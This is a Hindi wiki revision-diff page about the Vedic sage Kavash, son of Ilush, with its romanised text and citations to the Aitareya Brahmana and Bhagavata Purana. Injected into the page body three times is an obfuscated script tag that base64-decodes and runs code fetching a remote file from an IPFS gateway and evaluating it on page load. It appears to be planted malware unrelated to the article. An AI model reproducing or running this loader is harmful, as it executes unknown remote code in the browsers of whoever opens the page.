Difference between revisions of "कवष"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - ")</ref" to "</ref")
 
(3 intermediate revisions by 2 users not shown)
Line 1: Line 1:
{{पुनरीक्षण}}
+
#कवष [[ऋषि]] जो इलूष के पुत्र थे, यह एक दासी के गर्भ से उत्पन्न हुए थे। कवष के बनाये मंत्र [[ऋग्वेद]] के दसवें मण्डल में मिलते हैं। [[ऐतरेय ब्राह्मण]] के लेखों के अनुसार सारस्वत प्रदेश में एक [[यज्ञ]] हो रहा था। कवष ने ऋषियों की पंक्ति में बैठकर भोजन-पानी करना चाहा, पर ऋषियों ने दासी-पुत्र कहकर इनका बहिष्कार किया। तदुपरांत इन्होंने बहुत से मंत्र रचकर [[देवता|देवताओं]] को प्रसन्न किया तब ऋषियों ने भी भेदभाव दूरकर कवष को अपनी पंक्ति में सम्मिलित कर लिया।<ref>[[ऐतरेय ब्राह्मण]] 2.29.</ref>
#कवष एक [[ऋषि]] का नाम जो इलूष के पुत्र थे, कवष एक दासी के गर्भ से उत्पन्न हुए थे। कवष के बनाये मंत्र [[ऋग्वेद]] के दसवें मण्डल में मिलते हैं। ऐतरेयब्राह्मण के लेखों के अनुसार सारस्वत प्रदेश में एक यज्ञ हो रहा था। कवष ने ऋषियों की पंक्ति में बैठकर भोजन-पानी करना चाहा, पर ऋषियों ने दासी-पुत्र कहकर इनका बहिष्कार किया। तदुपरांत इन्होंने बहुत से मंत्र रचकर देवताओं को प्रसन्न किया तब ऋषियों ने भी भेदभाव दूरकर उन्हें अपनी पंक्ति में सम्मिलित कर लिया<ref>ऐ.ब्रा.2.29.</ref>
+
#एक ऋषि जो तुर के पिता थे। यह [[युधिष्ठिर]] यज्ञ में आमंत्रित थे और [[प्रायोपवेश]] के समय [[परीक्षित]] से मिलने गये थे।<ref>[[भागवत पुराण]] 9.22.37;10.74.7;1.19.10</ref>
#एक ऋषि जो तुरके पिता थे। यह [[युधिष्ठिर]] [[यज्ञ]] में आमंत्रित थे और प्रायोपवेश के समय [[परीक्षित]] से मिलने गये थे<ref>[[भागवत पुराण]] 9.22.37;10.74.7;1.19.10</ref>
 
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1 |माध्यमिक= |पूर्णता= |शोध= }}
Line 10: Line 9:
  
 
==संबंधित लेख==
 
==संबंधित लेख==
[[Category:पौराणिक चरित्र]]
+
{{ऋषि मुनि2}}{{ऋषि मुनि}}
[[Category:पौराणिक कोश]]
+
[[Category:ऋषि मुनि]][[Category:संस्कृत साहित्यकार]]
[[Category:नया पन्ना]]
+
 
 
__INDEX__
 
__INDEX__

Latest revision as of 07:27, 6 December 2011

  1. kavash rrishi jo iloosh ke putr the, yah ek dasi ke garbh se utpann hue the. kavash ke banaye mantr rrigved ke dasavean mandal mean milate haian. aitarey brahman ke lekhoan ke anusar sarasvat pradesh mean ek yajn ho raha tha. kavash ne rrishiyoan ki pankti mean baithakar bhojan-pani karana chaha, par rrishiyoan ne dasi-putr kahakar inaka bahishkar kiya. taduparaant inhoanne bahut se mantr rachakar devataoan ko prasann kiya tab rrishiyoan ne bhi bhedabhav doorakar kavash ko apani pankti mean sammilit kar liya.[1]
  2. ek rrishi jo tur ke pita the. yah yudhishthir yajn mean amantrit the aur prayopavesh ke samay parikshit se milane gaye the.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. aitarey brahman 2.29.
  2. bhagavat puran 9.22.37;10.74.7;1.19.10

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script><script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>